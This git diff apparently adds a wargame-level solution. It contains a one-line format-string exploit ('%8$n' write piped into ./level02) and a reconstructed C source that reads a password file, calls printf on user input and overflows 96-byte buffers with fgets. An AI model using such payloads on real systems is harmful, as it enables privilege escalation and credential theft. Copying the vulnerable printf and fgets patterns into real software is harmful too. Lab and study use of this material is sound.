diff --git a/level02/ressources/exploit b/level02/ressources/exploit
new file mode 100644
index 0000000..2f1fed9
--- /dev/null
+++ b/level02/ressources/exploit
@@ -0,0 +1 @@
+(python -c 'print("%4196997p" + "%8$n" + "\n" + "\x28\x12\x60")'; cat) | ./level02
diff --git a/level02/source.c b/level02/source.c
new file mode 100644
index 0000000..bac4bd4
--- /dev/null
+++ b/level02/source.c
@@ -0,0 +1,53 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(void)
+{
+	char buff[96];
+	int v5;
+	char password[48];
+	char s[96]; // buffer located at the 28th element on the stack
+	int v8;
+	int len;
+	FILE *stream;
+
+	memset(s, 0, sizeof(s));
+	v8 = 0;
+	memset(password, 0, 41);
+	memset(buff, 0, sizeof(buff));
+	v5 = 0;
+	stream = 0;
+	len = 0;
+	stream = fopen("/home/users/level03/.pass", "r");
+	if (!stream) {
+		fwrite("ERROR: failed to open password file\n", 1, 36, stderr);
+		exit(1);
+	}
+	len = fread(password, 1, 41, stream);
+	password[strcspn(password, "\n")] = '\0';
+	if (len != 41) {
+		fwrite("ERROR: failed to read password file\n", 1, 36, stderr);
+		exit(1);
+	}
+	fclose(stream);
+	puts("===== [ Secure Access System v1.0 ] =====");
+	puts("/***************************************\\");
+	puts("| You must login to access this system. |");
+	puts("\\**************************************/");
+	printf("--[ Username: ");
+	fgets(s, 100, stdin);
+	s[strcspn(s, "\n")] = '\0';
+	printf("--[ Password: ");
+	fgets(buff, 100, stdin);
+	buff[strcspn(buff, "\n")] = '\0';
+	puts("*****************************************");
+	if (strncmp(password, buff, 41)) {
+		printf(s);
+		puts(" does not have access!");
+		exit(1);
+	}
+	printf("Greetings, %s!\n", s);
+	system("/bin/sh");
+	return 0;
+}